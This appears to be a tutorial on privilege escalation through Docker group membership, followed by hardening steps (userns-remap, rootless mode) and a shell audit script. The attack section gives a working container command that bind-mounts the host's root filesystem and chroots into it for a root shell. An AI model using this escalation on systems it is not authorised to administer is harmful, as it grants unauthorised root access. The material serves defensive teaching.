Overview

Docker needs root privileges to run properly. Following the Peter Parker quote "With great power comes great responsibility", we should focus on securing potential Docker vulnerabilities. One of them is privilege escalation through Linux namespaces.

Preconditions

  • A user already logged in on the host
  • That user is a member of the docker group
  • userns-remap is disabled

Attack - User with docker group on the host machine

First, check whether the current user is a member of the docker group and can therefore run the docker command. There are several ways to do that (id, groups), but the easiest is simply to run a docker command.

➜  ~ groups
janek adm sudo docker

To gain root privileges on the host, create (or use) a container with the host's root directory / bind-mounted inside it, and run the chroot command on that host directory from within the container.

docker run -it --rm -v /:/host alpine chroot /host

Result of the command should look like this:

➜  ~ docker run -it --rm -v /:/host alpine chroot /host
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@bf63f8813122:/# 

chroot changes the root directory of the current process. Here the process inside the container runs as root with the host's filesystem as its root, which means the user gains full privileges on the host.

root@bf63f8813122:/# docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
bf63f8813122        alpine              "chroot /host"      About a minute ago   Up About a minute                       xenodochial_torvalds
root@bf63f8813122:/# cd root
root@bf63f8813122:~# id

How to secure it?

  • Add only privileged users to the docker group (membership is effectively root-equivalent on the host)
  • Use userns-remap
  • Run Docker in rootless mode (some Docker features may not work properly)

Setting up remapping of the user namespace

Before starting the remap procedure, stop all running containers and then stop the Docker daemon.

docker container stop $(docker container ls -aq)
sudo systemctl stop docker

Open /etc/docker/daemon.json (create it if it does not exist) and add the parameter:

{
  "userns-remap": "default"
}

The setting above enables user-namespace remapping with the default user and group, dockremap, every time the Docker daemon starts.

Then start the Docker service again and reboot:

sudo systemctl start docker

After this procedure, root inside a container is mapped to the unprivileged dockremap user on the host.
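The mitigation list above and the remap procedure can be checked rather than trusted. The following audit helpers are an added example, not part of the original post: they report who is in the docker group, whether daemon.json enables userns-remap, and whether the remap user has a subordinate UID range in /etc/subuid (which the daemon needs to map container root to an unprivileged host UID). The helpers take file contents as arguments, so they run here against constructed sample data and can be pointed at the real files on a host. The sample usernames, GIDs and UID ranges are made up.

```shell
#!/bin/sh
# Audit helpers for the docker-group / userns-remap hardening described above.
# Added example; not code from the original post. Each function takes file
# CONTENTS (not paths) so it can be tested offline on constructed samples.

# Print the comma-separated member list of the docker group.
# /etc/group line format: name:password:gid:member1,member2
docker_group_members() {
    printf '%s\n' "$1" | awk -F: '$1 == "docker" { print $4 }'
}

# Exit 0 when daemon.json sets a non-empty "userns-remap" value, 1 otherwise.
# An empty string ("userns-remap": "") would leave remapping disabled.
userns_remap_enabled() {
    printf '%s\n' "$1" | grep -Eq '"userns-remap"[[:space:]]*:[[:space:]]*"[^"]+"'
}

# Exit 0 when user $2 has a subordinate UID range with a positive count.
# /etc/subuid line format: user:start:count
subuid_range_present() {
    printf '%s\n' "$1" | awk -F: -v u="$2" \
        '$1 == u && $3 > 0 { found = 1 } END { exit found ? 0 : 1 }'
}

# Summarise the three checks for one host snapshot.
audit_host_snapshot() {
    members=$(docker_group_members "$1")
    echo "docker group members: ${members:-<none>}"
    if userns_remap_enabled "$2"; then
        echo "userns-remap: enabled"
    else
        echo "userns-remap: DISABLED (docker group members are root-equivalent on this host)"
    fi
    if subuid_range_present "$3" dockremap; then
        echo "subuid range for dockremap: present"
    else
        echo "subuid range for dockremap: missing"
    fi
}

# --- Constructed sample inputs (hypothetical users and ranges) ---
SAMPLE_GROUP='root:x:0:
sudo:x:27:janek
docker:x:998:janek,build'
SAMPLE_DAEMON_OFF='{}'
SAMPLE_DAEMON_ON='{
  "userns-remap": "default"
}'
SAMPLE_SUBUID='janek:100000:65536
dockremap:165536:65536'

# Stand-alone demonstration: a host before and after enabling remapping.
echo "== before remap =="
audit_host_snapshot "$SAMPLE_GROUP" "$SAMPLE_DAEMON_OFF" "$SAMPLE_SUBUID"
echo "== after remap =="
audit_host_snapshot "$SAMPLE_GROUP" "$SAMPLE_DAEMON_ON" "$SAMPLE_SUBUID"
```

On a real host, source the script and run audit_host_snapshot with "$(cat /etc/group)", "$(cat /etc/docker/daemon.json 2>/dev/null)" and "$(cat /etc/subuid)" as its three arguments; a missing daemon.json yields an empty string and is correctly reported as remapping disabled.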

Sources